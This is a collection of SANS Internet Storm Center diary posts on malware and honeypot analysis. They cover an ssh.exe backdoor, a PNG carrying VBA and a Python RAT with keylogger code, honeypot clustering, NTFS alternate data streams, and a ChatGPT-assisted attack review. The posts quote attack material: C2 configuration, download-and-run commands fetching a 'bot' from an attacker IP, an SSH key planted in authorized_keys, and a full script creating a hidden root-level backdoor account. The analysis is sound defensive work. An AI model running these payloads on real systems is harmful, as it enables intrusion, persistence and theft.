(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

For most system and network administrators, the free SSH client Putty has been their best friend for years! This tool was also (ab)used by attackers that deployed a trojanized version[1]. Microsoft had the good idea to include OpenSSH (beta version) in Windows 10 Fall Creators Update. One year later, it became a default component with Windows 10 version 1803. I remember the join of type for the first time "ssh" or "scp" in a cmd.exe! SSH is a very powerful tool that can be used in multiple ways, and it was de-facto categorized as a "LOLBIN"[2]. 

I'm hunting for scripts or binaries that refer to "C:\Windows\System32\OpenSSH\ssh.exe" and found an interesting sample. The file was uploaded on VT as "dllhost.exe" (SHA256:b701272e20db5e485fe8b4f480ed05bcdba88c386d44dc4a17fe9a7b6b9c026b) with a score of 18/71[3]. It tries to abuse ssh.exe to implement a simple backdoor on the victim's computer. It did not work when I started to analyze it on my REMWorkstation (the Windows system we used in FOR610[4]), I had to install OpenSSH manually. Let's review how it behaves.

First, the malware tries to start an existing "SSHService" service:

If it's not successfull, the malware tries to read a registry key (SOFTWARE\SSHservice) and access the previously saved random port:

If not found (first malware execution), a random port is generated:

Then saved:

A SSH configuration file is created, it contains the attacker's C2:

Now the malware enters an infinite loop and performs a long sleep at each iteration:

Then it tries to launch a ssh.exe process with the generated configuration file:

The malware creates the configuration file in c:\windows\temp\config:
Host version
    Hostname 193[.]187[.]174[.]3
    User ugueegfueuagu17t1424acs
    Port 443
    ServerAliveInterval 60
    ServerAliveCountMax 15
    RemoteForward 40909
    StrictHostKeyChecking no
    SessionType None

The C2 server was down but the configuration file in invalid, the line 7, the RemoteForward syntax is:

RemoteForward [bind_address:]port local_address:local_port

Conclusion: OpenSSH being available on most Windows hosts for a while, it deserves some monitoring! (scp.exe is a nice way to exfiltrate data)

[1] https://hivepro.com/threat-advisory/unc4034-slips-in-a-backdoor-with-trojanized-putty/
[2] https://lolbas-project.github.io/lolbas/Binaries/Ssh/
[3] https://www.virustotal.com/gui/file/b701272e20db5e485fe8b4f480ed05bcdba88c386d44dc4a17fe9a7b6b9c026b/details
[4] https://www.sans.org/cyber-security-courses/reverse-engineering-malware-malware-analysis-tools-techniques/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

YARA 4.5.3 was released with 5 bugfixes.

I want to take this as an opportunity to remind you that YARA is to be replaced with YARA-X, a rewrite in Rust.

YARA-X is already powering VirusTotal.

Didier Stevens
Senior handler
blog.DidierStevens.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

While hunting, I found an interesting picture. It's a PNG file that was concatenated with two interesting payloads. There are file formats that are good candidates to have data added at the end of the file. PNG is the case because the file format specifications says:

"One notable restriction is that IHDR must appear first and IEND must appear last; thus the IEND chunk serves as an end-of-file marker."[1]

All data after this "IEND" should be ignored by the program reading and rendering the picture. You can therefore append data to a PNG file with a simple command like this:

$ cat binary.png data.zip >image.png
$ xxd image.png |grep -A 3 -B 3 IEND
00000220: 6b33 4ddd 7857 677e 66a8 bdec 22f6 8ede  k3M.xWg~f..."...
00000230: 591e 022c 7097 b1f3 3978 860a b222 b99d  Y..,p...9x..."..
00000240: 9dd7 501c cc47 8870 b331 e000 0021 9019  ..P..G.p.1...!..
00000250: dd9b 8830 f200 0000 0049 454e 44ae 4260  ...0.....IEND.B`
00000260: 8250 4b03 040a 0000 0000 00cd 25bf 5aaf  .PK.........%.Z.
00000270: 4c9d 8100 0100 0000 0100 0007 001c 0064  L..............d
00000280: 6174 612e 677a 5554 0900 03a1 893a 68a7  ata.gzUT.....:h.

You can see the "IEND", its CRC (4 bytes) and then the magic bytes for a ZIP archive: "PK".

The picture I found seems to be a proof-of-concept and I don't know how it is dropped and processed on the victim's computer:

This picture triggered a YARA rule because it has embedded VBA code and Python code!

The VBA code is split from the PNG with two dot characters (0x2E2E):

Set objShell = CreateObject("WScript.Shell") Set objEnv = objShell.Environment("User") strDirectory = objShell.ExpandEnvironmentStrings("%temp%") dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP") dim bStrm: Set bStrm = createobject("Adodb.Stream") xHttp.Open "GET", "hxxps://media[.]discordapp[.]net/attachments/773993506615722064/798005313278050354/haly.png", False xHttp.Send with bStrm .type = 1 '//binary .open .write xHttp.responseBody .savetofile strDirectory + "\haly.png", 2 '//overwrite end with objShell.RegWrite "HKCU\Control Panel\Desktop\Wallpaper", strDirectory + "\haly.png" objShell.Run "%windir%\System32\RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters", 1, True

This code will updated the desktop wallpaper. Then, a Python RAT is also concatenated:

class RAT_CLIENT:
    def __init__(self, host, port):
        self.host = host
        self.port = port
        self.curdir = os.getcwd()

    def build_connection(self):
        global s
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((self.host, self.port))
        sending = socket.gethostbyname(socket.gethostname())
        s.send(sending.encode())
    
    def errorsend(self):
        output = bytearray("no output", encoding='utf8')
        for i in range(len(output)):
            output[i] ^= 0x41
        s.send(output)
    ^M
    def keylogger(self):
        def on_press(key):
            if klgr == True:
                with open('keylogs.txt', 'a') as f:
                    f.write(f'{key}')
                    f.close()

        with Listener(on_press=on_press) as listener:
            listener.join()
    
    def block_task_manager(self):
        if ctypes.windll.shell32.IsUserAnAdmin() == 1:
            while (1):
                if block == True:
                    hwnd = user32.FindWindowW(0, "Task Manager")
                    user32.ShowWindow(hwnd, 0)
                    ctypes.windll.kernel32.Sleep(500)
    
    def disable_all(self):
        while True:
            user32.BlockInput(True)
    
    def disable_mouse(self):
        mouse = Controller()
        t_end = time.time() + 3600*24*11
        while time.time() < t_end and mousedbl == True:
            mouse.position = (0, 0)
    
    def disable_keyboard(self):
        for i in range(150):
            if kbrd == True:
                keyboard.block_key(i)
        time.sleep(999999)
    
    def execute(self):
        [...]

The file (SHA256:f014123c33b362df3549010ac8b37d7b28e002fc9264c54509ac8834b66e15ad) has a low VT score: 4/61, even if not obfuscated. This prooves that a simple concatenation of files helps to deliver malicious code. The payload can be easily extracted via a few lines of Python:

with open("malicious.png", "rb") as f:
    f.seek(216580) # Offset of Python code in the PNG file
    code = f.read().decode("utf-8")
exec(code)

[1] https://www.libpng.org/pub/png/spec/1.2/PNG-Structure.html

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

DShield honeypots [1] receive different types of attack traffic and the volume of that traffic can change over time. I've been collecting data from a half dozen honeypots for a little over a year to make comparisons. This data includes:

• Cowrie logs [2], which contain SSH and telnet attacks
• Web honeypot logs
• Firewall logs (iptables)
• Packet captures using tcpdump

The highest volume of activity has been for my residentially hosted honeypot. 

Figure 1: Cowrie log volume by honeypot starting on 4/21/2024, covering approximately 1 year. 

 

The data is processed with some python scripts to identity data clusters and outliers [3]. This weekend I learned that there is only so much memory you can throw at a probelm before you need to consider a different strategy for analyzing data. While doing clustering of unique commands submitted to my honeypots, my python script crashed. It left me with a problem on what do to next. One of the options that I had was to try and look at a subset of the command data. But what subset?

Something that was interesting when previously reviewing the data was how many different kinds of password change attempts happened on honeypots. This was one of the reasons that I tried to do clustering in the first place. I wanted to be able to group similar commands, even if there were deviations, such as the username and password attempted for a password change command. 

A summary of the data volume for submitted commands ("input" field in Cowrie data):

Unique commands: 536,508
Unique commands with "passwd" used: 502,846
Percentage of commands with "passwd" included: 93.73%

Considering that 94% of the unique commands submitted had something to do with "passwd", I decided to filter those out, which would allow me to cluster the remaining data without any memory errors. That still left how to review this password data and look for similar clusters. My solution was simply to sort the data alphabetically and take every third value for analysis. 

# sort pandas dataframe using the "input" column
unique_commands_passwd = unique_commands_passwd.sort_values(by='input')

# take every third value from the dataframe and store it in a new datafame for analysis
unique_commands_passwd_subset = unique_commands_passwd.iloc[::3, :]

This allowed me to process the data, but it does have some shortcomings. If there were three adjacent entries that may have been outliers or unique clusters, some of that data would get filtered out. Another option in this case could be to randomly sample the data.

From this clustering process, 17 clusters emerged. Below are examples from each cluster. 

 

Command	Cluster
apt update && apt install sudo curl -y && sudo useradd -m -p $(openssl passwd -1 45ukd2Re) system && sudo usermod -aG sudo system	0
echo "czhou\np2mk0NIg9gRF\np2mk0NIg9gRF\n"|passwd	1
echo "$#@!QWER$#@!REWQFDSAVCXZ\nougti9mT9YAa\nougti9mT9YAa\n"|passwd	2
echo "540df7f83845146f0287ff6d2da77900\nE3oSNKfWpq1s\nE3oSNKfWpq1s\n"|passwd	3
echo "A@0599343813A@0599343813A@0599343813\nymL1D2CvlBlW\nymL1D2CvlBlW\n"|passwd	4
echo "ItsemoemoWashere2023support\nnZsvXDsxcCEm\nnZsvXDsxcCEm\n"|passwd	5
echo "root:ddKCQwpLRc9Q"|chpasswd|bash	6
echo -e "Passw0rd\ndljyjtNPLEwI\ndljyjtNPLEwI"|passwd|bash	7
echo -e "xmrmining@isntprofitable\n7UrX3NlsBj6i\n7UrX3NlsBj6i"|passwd|bash	8
echo -e "540df7f83845146f0287ff6d2da77900\nHB15VQlzOyOo\nHB15VQlzOyOo"|passwd|bash	9
echo -e "A@0599343813A@0599343813A@0599343813\nymL1D2CvlBlW\nymL1D2CvlBlW"|passwd|bash	10
echo -e "ItsemoemoWashere2023support\nnZsvXDsxcCEm\nnZsvXDsxcCEm"|passwd|bash	11
lscpu && echo -e "yNHYAVV3\nyNHYAVV3" | passwd && curl https://ipinfo.io/org --insecure -s && free -h && apt	12
lscpu | grep "CPU(s):                " && echo -e "5XHeUh9gNe76\n5XHeUh9gNe76" | passwd && pkill bin.x86_64; cd /tmp; wget http://45.89.28[.]202/bot; curl -s -O http://45.89.28[.]202/bot; chmod 777 bot; ./bot;	13
lscpu | grep "CPU(s):                " && echo -e "9nz66TbaU9Y8\n9nz66TbaU9Y8" | passwd && pkill bin.x86_64; cd /tmp; wget http://45.89.28[.]202/bot; curl -s -O http://45.89.28[.]202/bot; chmod 777 bot; ./bot; iptables -A INPUT -s 194.50.16[.]26 -j DROP; iptables -A INPUT -s 85.239.34[.]237 -j DROP; iptables -A INPUT -s 186.2.171[.]36 -j DROP	14
lscpu | grep "CPU(s):                " && echo -e "Gr7gWzAzts5y\nGr7gWzAzts5y" | passwd && pkill bin.x86_64; cd /tmp; wget http://45.89.28[.]202/bot; curl -s -O http://45.89.28[.]202/bot; chmod 777 bot; ./bot; iptables -A INPUT -s 194.50.16[.]26 -j DROP; iptables -A INPUT -s 85.239.34.237 -j DROP	15
openssl passwd -1 45ukd2Re	16

Figure 2: Sampling of commands with "passwd" used for each cluster identified. 

 

Some of these could probably be clustered better with different feature selections, but it's still a nice grouping. I was a bit more interested in what the outliers looked like (cluster=-1).
 

Figure 3: Clustering outliers highlighting some more unique entries. 

 

Commands
#!/bin/bash username="local" version="1.3" if [ "$EUID" -ne 0 ]; then   echo "[-] Run as root!"   exit fi getent passwd $username > /dev/null if [ $? -eq 0 ]; then   echo "[-] Username $username is already being used!"   exit fi <rest of script not included>
;             arch_info=$(uname -m);             cpu_count=$(nproc);             gpu_count=$(lspci | egrep -i 'nvidia|amd' | grep -e VGA -e 3D | wc -l);             echo -e "YnEGa37O\nYnEGa37O" | passwd > /dev/null 2>&1;             if [[ ! -d "${HOME}/.ssh" ]]; then;                 mkdir -p "${HOME}/.ssh" >/dev/null 2>&1;             fi;             touch "${HOME}/.ssh/authorized_keys" 2>/dev/null;             if [ $? -eq 0 ]; then;                 echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys;                 chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1;                 chmod 700 ${HOME}/.ssh >/dev/null 2>&1;                 ssh_status="success";             else;                 ssh_status="failed";             fi;             users=$(cat /etc/passwd | grep -v nologin | grep -v /bin/false | grep -v /bin/sync | grep -v /sbin/shutdown | grep -v /sbin/halt | cut -d: -f1 | sort);             echo "$arch_info:$cpu_count:$gpu_count:$users:$ssh_status";
ps -HewO lstart ex;echo finalshell_separator;ls --color=never -l /proc/*/exe;echo finalshell_separator;cat /etc/passwd;echo finalshell_separator;ip addr;echo finalshell_separator;pwd;echo finalshell_separator;uname -s;uname -n;uname -r;uname -v;uname -m;uname -p;uname -i;uname -o;echo finalshell_separator;cat /etc/system-release;cat /etc/issue;echo finalshell_separator;cat /proc/cpuinfo;echo finalshell_separator;

Figure 4: Commands that looked more unique among the cluster outliers. 

 

These were much more interesting, especially the first one since I was anticipating to find a reference for the script somewhere, but have found anything. The full script here:

#!/bin/bash
username="local"
version="1.3"

if [ "$EUID" -ne 0 ]; then
  echo "[-] Run as root!"
  exit
fi

getent passwd $username > /dev/null
if [ $? -eq 0 ]; then
  echo "[-] Username $username is already being used!"
  exit
fi

echo "[+] SSH Vaccine Script v$version"

os=`lsb_release -is 2>/dev/null || echo unknown`
cpus=`lscpu 2>/dev/null | egrep "^CPU\(s\):" | sed -e "s/[^0-9]//g" || nproc 2>/dev/null || echo 0`

# Create the backdoor username.
echo "[!] Create username $username with administrator privilege."
if [ ! -d /home ]; then
  mkdir /home
  echo "[!] Folder /home was created."
fi
passwd=$(timeout 10 cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1)
h="$pwhash"
if [ -x "$(command -v openssl)" ]; then
  h=$(echo $passwd | openssl passwd -1 -stdin)
else
  passwd="$pw"
fi
useradd $username -o -u 0 -g 0 -c "local" -m -d /home/$username -s /bin/bash -p "$h"

if ! grep -q "^$username:" /etc/passwd;then
  echo "cannot add user"
  exit
fi

if [ -x "$(command -v ed)" ]; then
  printf "%s\n" '$m1' wq | ed /etc/passwd -s
  printf "%s\n" '$m1' wq | ed /etc/shadow -s
else
  lo=$(tail -1 /etc/passwd)
  sed -i "/^$username:/d" /etc/passwd
  sed -i "/^root:.*:0:0:/a $lo" /etc/passwd

  lo=$(tail -1 /etc/shadow)
  sed -i "/^$username:/d" /etc/shadow
  sed -i "/^root:/a $lo" /etc/shadow
fi

echo "[!] Generated password: $passwd"
echo "[!] Set the profile."
echo "unset HISTFILE" >> /home/$username/.bashrc
echo 'export PS1="\[$(tput setaf 2)\][\[$(tput sgr0)\]\[$(tput bold)\]\[$(tput setaf 2)\]\u@\h \W\[$(tput sgr0)\]\[$(tput setaf 2)\]]\[$(tput sgr0)\]\[$(tput bold)\]\[$(tput setaf 7)\]\\$ \[$(tput sgr0)\]"' >> /home/$username/.bashrc
echo "cd /var/www/httpd" >> /home/$username/.bashrc
echo "w" >> /home/$username/.bashrc
echo "################################################################################"

echo "#######################################################################" > /tmp/sshd_config_tmp
echo "#                    ! ! ! ! ! IMPORTANT ! ! ! ! !                    #" >> /tmp/sshd_config_tmp
echo "# * Your system has detected a weak password for root account and for #" >> /tmp/sshd_config_tmp
echo "# security reasons, remote access via SSH has been blocked to prevent #" >> /tmp/sshd_config_tmp
echo "# unauthorized access. In order to enable again remote access to this #" >> /tmp/sshd_config_tmp
echo "# machine for root user via SSH, set a new complex password for root  #" >> /tmp/sshd_config_tmp
echo "# account and delete 'DenyUsers root' line below on this config file. #" >> /tmp/sshd_config_tmp
echo "# * Restarting the SSH Daemon is required for changes to take effect. #" >> /tmp/sshd_config_tmp
echo "#                                                                     #" >> /tmp/sshd_config_tmp
echo "# Bash commands:                                                      #" >> /tmp/sshd_config_tmp
echo "# passwd root             (Changes your root password).               #" >> /tmp/sshd_config_tmp
echo "# service sshd restart    (Restart the SSH Daemon).                   #" >> /tmp/sshd_config_tmp
echo "DenyUsers root" >> /tmp/sshd_config_tmp
echo "#######################################################################" >> /tmp/sshd_config_tmp
cat /etc/ssh/sshd_config >> /tmp/sshd_config_tmp
yes | cp /tmp/sshd_config_tmp /etc/ssh/sshd_config > /dev/null 2>&1
rm -rf /tmp/sshd_config_tmp

systemctl restart ssh || systemctl restart sshd || service ssh restart || service sshd restart || /etc/init.d/ssh restart || /etc/init.d/sshd restart
if [ $? -eq 0 ];then
  echo "SSHD restarted"
else
  echo "SSHD error"
fi


ip=$ip
echo "[!] IP: $ip"

# Try to get a hostname from IP.
dns=`getent hosts $ip | awk '{print $2}'`
if [ -z "$dns" ]
then
  dns=null
fi
echo "[!] DNS: $dns"

# Get country name from IP.
country=`wget -qO- https://api.db-ip.com/v2/free/$ip/countryName 2>/dev/null || curl -ks -m30 https://api.db-ip.com/v2/free/$ip/countryName 2>/dev/null || echo X`


echo "[!] List of usernames on this machine:"
ls /home | awk '{print $1}'

echo "[!] List of ethernet IP addresses:"
ip addr show | grep -o "inet [0-9]*\.[0-9]*\.[0-9]*\.[0-9]*" | grep -o "[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*"
echo "################################################################################"

# Print all info necessary about the machine.
echo ""
uname -a
echo "$username $passwd $h"
echo "$ip,$dns,root,$username,$passwd,$cpus,$os,$country"
echo ""
echo "################################################################################"

 

I have only seen this command once on my Digital Ocean honeypot on 9/13/2024 from %%ip:194.169.175.107%%. I'll dive into the script and some of the other activity from this host in a future diary. 

The clustering exercise helped to find one item that was unqiue out of over 500,000 values. This was a good lesson for me to find ways to sample data and save memory resources.

 

[1] https://isc.sans.edu/honeypot.html
[2] https://github.com/cowrie/cowrie
[3] https://isc.sans.edu/diary/31050

--
Jesse La Grew
Handler

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[This is a Guest Diary by Ehsaan Mavani, an ISC intern as part of the SANS.edu BACS program]

Introduction

Adversaries are leveraging alternate data streams to hide malicious data with the intent of evading detection. Numerous different malicious software has been designed to read and write to alternate data streams [1]. To better assist in detecting and responding to cyber threats, it is important that we understand what an alternate data stream is, ways to discretely write to an alternate data stream, and tools that can assist in detecting alternate data streams.

Alternate Data Stream

Every file on a Windows NTFS file system has a default unnamed data stream. This is the mainstream which stores the files data and can be easily viewed with File Explorer. Alternate Data Streams are a Microsoft Windows New Technology File System (NTFS) feature which was added to help support Apple’s Hierarchical File System (HFS) [2]. An Alternate Data Stream is different from the default unnamed mainstream. Alternate Data Streams are named and are not visible within File Explorer [3]. This gives us the capability to write data to a known good files alternate data stream. Essentially, we are able to hide malicious or secret files inside of an innocuous file which can’t be seen in File Explorer.

Directories can also have alternate data streams. Unlike files, directories do not have a default data stream. Instead, they have a default directory stream [3].

Why does this matter?

Adversaries want to complete their objectives and need to do so in a manner which evades detection. If our defensive tools and processes don’t scrutinize alternate data streams, adversaries are going to take advantage of our defensive blind spots. Sophisticated threat actors have been using alternate data streams to write and read data. Mitre ATT&CK has documented several skilled groups and malicious software that use this technique, categorized by Mitre as T1564.004 [1].

As a case study, the group known as Indrik Spider [4] has been operating the malicious software BitPaymer [4] to launch targeted ransomware campaigns. In 2017, BitPaymer was first identified being used to ransom the U.K.’s National Health Service, demanding 53 bitcoins. Once a computer has been compromised, the BitPaymer malware attempts to run from an alternate data stream. If it is not being run from an alternate data stream, it automatically creates a file and copies itself to the arbitrarily named alternate data stream ‘bin’. The BitPaymer ransomware has netted Indrik Spider $1.5M USD in the first 15 months of operations [4].

Writing & Reading an Alternate Data Stream

I created an empty directory and ran the commands below. When I wrote data to a nonexistent files alternate data stream, Windows automatically created the files default mainstream with no data. Windows also created an alternate data stream with the name ‘secret’, which I specified. Alternate data streams can be named using all Unicode characters except for backslash, forward slash, colon, and control character 0x00. A stream name can be no more than 255 characters in length [5].
1. Write data to a text file’s alternate data stream which I named ‘secret’
2. List directory contents. Windows created file.txt’s default data stream with 0 bytes of data. The alternate data stream ‘secret’ is not visible. Viewing the directory contents in File Explorer will also only show file.txt with 0 bytes of data.
3. Using dir /r to display alternate data streams of files. file.txt:secret will not be shown in File Explorer
4. Displays contents of the text file’s main data stream. Nothing is outputted onto the screen because there is no data in file.txt’s main data stream. Opening the file in Notepad.exe will also show an empty file.
5. Explicitly specify the filename and the stream name to read data

Figure 1 Writing, reading, and displaying a file alternate data stream

Executing Alternate Data Streams

Alternate data streams can be directly executed by many Windows tools [6]. Powershell, rundll32, wmic, wscript, and cscript are some of the tools that are capable of executing binaries in alternate data streams. These are all legitimate tools that are pre-installed on Windows operating systems.

I created an executable that enumerates all files on a victim machine, sending the results to an attacker-controlled web server via URL encoded GET requests. I hid the executable inside of an alternate data stream. The executable was successfully run with wmic.

Figure 2 Executing enumerateFiles.exe in GoodFile’s alternate data stream

Alternate Data Streams in Reserved Names

There are special reserved names in Microsoft Windows that cannot be used for file names [7]. CON is one of those unique reserved file names. If you try to create a file with the name CON using File Explorer, Windows will display an error, preventing the creation of the file.

Figure 3 Windows error when creating a file with a reserved name in File Explorer

Interestingly, it is possible to circumvent this error and successfully create a file with a reserved name by utilizing special prefixes [8]. “\\?\” is a prefix that can be used to tell the Windows API to disable string parsing, sending the string that follows the prefix straight to the file system [7].

Even more insidious, alternate data streams written to files with reserved names are not visible to directory listings with dir /r unless the prefix “\\?\” is added to the file path. In order to read, write, and delete the file, the prefix “\\?\” must be added to the file path.
1. Write data to the alternate data stream of a file with the reserved name CON. To create this file, the prefix “\\?\” must be included

2. List directory contents with dir /r. The file CON is visible, but the alternate data stream is not visible. If navigating to “C:\Temp\” within File Explorer, this file and the file’s alternate data stream will not be visible.

3. List directory contents with dir /r and the absolute file path of CON with “\\?\” prepended. The alternate data stream is visible. If navigating to “\\?\C:\Temp\” within File Explorer, this file will be visible, but the alternate data stream will not be visible.

Figure 4 Writing data to the alternate data stream of a reserved name

Detecting Alternate Data Streams in Files

Alternate data streams are part of the Windows NTFS file system and cannot be disabled. Understanding how adversaries create and interact with alternate data streams can help us detect and respond to suspicious streams [6]. Due to their naming convention, it is possible to create a detective control that monitors for reading, writing, or executing file names that contain a colon. Mitre has published Splunk queries that identify the execution of alternate data streams with common Windows tools [9]. To gain visibility into the different streams that exist, tools such as dir /r and Streams.exe [10], part of the Microsoft Sysinternals suite, can be used. It’s important to note that both tools mentioned can only view the streams of files with reserved names if the prefix “\\?\” is added before the absolute file path. On a Windows 64-bit operating system, Streams.exe was not able to find streams in the %systemroot%\System32 directory. Streams64.exe was successful in finding streams in the System32 directory.

As a starting point, I created a daily scheduled task to identify alternate data streams for all files in the %systemroot%\System32 directory recursively with Streams64.exe. The output is saved to a text file with the timestamp as the filename. This gives us the capability to track and analyze the addition of new streams over time.

The scheduled task starts cmd.exe with the argument /c C:\path\to\streams64.exe -s -nobanner %systemroot%\System32\ > C:\path\to\output\ADS_%date:~10,4%_%date:~4,2%_%date:~7,2%.txt

Figure 5 Using FC to compare the files automatically created with Streams64.exe and task scheduler

Unless we monitor for alternate data streams, they remain an invisible safe haven for threat actors to write and potentially execute malicious binaries. Manually finding streams within our Windows NTFS file systems is unscalable. Command line tool can be used with task scheduler to periodically enumerate streams. Automating this process helps us gain visibility into streams that may be hiding on our systems.

[1] https://attack.mitre.org/techniques/T1564/004/
[2] https://www.irongeek.com/i.php?page=security/altds
[3] https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3
[4] https://www.crowdstrike.com/en-us/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/
[5] https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/5953f072-b28c-4fbf-ae50-09b0173317b9
[6] https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
[7] https://learn.microsoft.com/en-us/windows/win32/fileio/naming-a-file
[8] http://www.sourceconference.com/publications/bos10pubs/Windows%20File%20Pseudonyms.pptx
[9] https://car.mitre.org/analytics/CAR-2020-08-001/
[10] https://learn.microsoft.com/en-us/sysinternals/downloads/streams
[11] https://www.sans.edu/cyber-security-programs/bachelors-degree/

-----------
Guy Bruneau IPSS Inc.
My GitHub Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[This is a Guest Diary by Jennifer Wilson, an ISC intern as part of the SANS.edu Bachelor's Degree in Applied Cybersecurity (BACS) program [1].]

As part of my BACS internship with SANS, I setup and maintained a DShield honeypot instance using a physical Raspberry Pi device.  As I was putting together each of my attack observations that were due, I started to wonder how helpful AI would be. One of the things I wanted to do when I started the internship was to step outside of my comfort zone. While I have read a lot about AI, I have only used it a handful of times. So, I wondered if it would lead me astray? Would it provide valid actionable data?

In this blog post, I will explore how accurate and helpful ChatGPT is with identifying one of the more unique attacks I say over the past few months.

To set the stage, I first noticed this attack after running the cowrieprocessor script [2] on my honeypot. The attack occurred on 2025-04-20 and came from IP address 63[.]212[.]157[.]187. The total attack occurred over a duration of 62.83 seconds. According to AbuseIPDB [3], the IP has been reported 300 times, and it has been marked with a 100% confidence of abuse. This IP has been busy in the world. Along with this basic data, the following commands were captured being ran on the honeypot:

# ifconfig
# uname -a
# cat /proc/cpuinfo
# ps | grep '[Mm]iner'
# ps -ef | grep '[Mm]iner'
# ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
# locate D877F783D5D3EF8Cs
# echo Hi | cat -n 

 

Let’s first break down the first 5 commands:

Command	Use
ipconfig	Displays network configuration in Unix-Like environments.
uname -a	Displays system information.
cat /proc/cpuinfo	Displays CPU information.
ps | grep ‘[Mm]iner’	Searches running processes for the string ‘Miner’ or ‘miner’.
ps -ef | grep ‘[Mm]iner’	Searches running processes for the string ‘Miner’ or ‘miner’ and provides detailed information for the matching data.

Figure 1: Break down of commands the attacker ran and its function

Ok, those are common commands that an attacker will often run to attempt to discover more information about a system on which they have landed on. Searching specifically for ‘[Mm]iner’ is interesting. The attacker is trying to discover if the system is currently being used as a crypto miner.

The next two commands caught my attention. The following command is searching to determine if the mentioned paths exist on the file system, including if they are hidden:
 

?ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*?

 

The ‘locate D877F783D5D3EF8Cs’ command is attempting to locate ‘D877F783D5D3EF8Cs’ on the file system. But what is ‘D877F783D5D3EF8Cs’? This is not a string I have seen before. Normally I would run to Google and start searching around to see if I could determine what it is. I got to wonder though, could ChatGPT or another platform provide me with results as well. More importantly would it provide me with accurate results?

I started out simple, as can be seen in the below screenshot from my ChatGPT conversation [4], to see what feedback it would provide.

Figure 2: ChatGPT’s response to ‘What is D877F783D5D3EF8Cs’.

 

Given the response that ChatGPT had, I clearly need to be more specific in my request.

Figure 3: ChatGPT’s response to telling it that ‘D877F783D5D3EF8Cs’ was found on a honeypot.

 

ChatGPT still seems to be guessing a bit. I want to see if I can get it to give me a more specific answer. Let’s see what happens when I provide it with the full command that was detected on the honeypot. Here is a snippet of what ChatGPT provided back:

Figure 4: ChatGPT’s response to providing the full command that was detected on the honeypot.

 

This has gotten me closer to a definite answer. I got curious about what would happen if I gave it the context of the command that was run before it. A snippet of its response is found below:

Figure 5: ChatGPT’s response to providing it the previous ls -la command.

 

The responses are now getting more detailed. ChatGPT suggests that the attack I am reviewing is part of a credential harvesting or SMS hijacking campaign [4]. Let’s see if it knows of any connection between the ‘D877F783D5D3EF8Cs’ and Telegram:

Figure 6: ChatGPT’s response when asking about a connection between the string ‘D877F783D5D3EF8Cs’ and Telegram.

 

While I only asked ChatGPT [3] about the context of ‘D877F783D5D3EF8Cs’ in relation to Telegram, it narrowed it down to Telegram Desktop and specifically the folder tdata. Looking back at the ls -la command, one of the folders the attacker was trying to list was ~/.local/share/TelegramDesktop/tdata. Without knowing exactly what the attacker was attempting to do, in the context of the rest of the commands the attacker ran, this seems like a logical response.

Now that I have gotten a logical response from ChatGPT, I always verify that response. A quick Google search led me to several sources that confirmed what ChatGPT was providing me with as a response [5][6][7].

While it took a bit of time probing ChatGPT to get an answer, the more context I gave it the better the result I got back. This would work well for an attack where I understood part of what was happening, but needed clarification on one section, like this attack.

Let’s see what would happen if I drop the ‘s’ off the string ‘D877F783D5D3EF8Cs’ and ask about just ‘D877F783D5D3EF8C’ in relation to Telegram. ChatGPT has been dropping it off in most of its responses to me so maybe it is just a typo.

Figure 7: ChatGPT’s response when asking about a connection between the string ‘D877F783D5D3EF8C’ and Telegram.

 

